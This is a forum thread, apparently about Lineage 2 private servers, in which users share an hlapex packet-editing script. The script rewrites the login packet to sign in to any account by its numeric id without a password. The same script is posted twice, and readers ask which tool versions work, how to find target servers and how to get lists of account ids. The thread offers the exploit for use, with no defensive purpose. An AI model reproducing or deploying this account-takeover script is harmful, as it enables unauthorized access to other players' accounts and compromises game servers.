Jump to content

[EXPLOIT!] How to log any account


Recommended Posts

  • 2 weeks later...

Thanks Thanos! in L2max  cant log in game with hlapex  and if i dont use this script... know any trick for log with hlapex ??  i know some tricks but  no work.. :(    thanks!! i will post here any bugs, exploit  what i found !! cya

Link to comment
Share on other sites

Copy exactly the code...

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

Link to comment
Share on other sites

Thx for response.. can u also tell me with what version this is working??

 

Tested : hLApEx Newest version .rar

            hlapex.rar

            hLapEx_By__GodOfAden.rar

            ynghlapex.rar

 

Thanx, regards

Link to comment
Share on other sites

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with hlapex

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

ty

Link to comment
Share on other sites

How do u find the servers? u just go to top100 and beign trying all exploits u have?u have any tool to know about protections? Another thing, how can we know a list of accounts in the servers, so we can make it hex or whateva ;)

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.



×
×
  • Create New...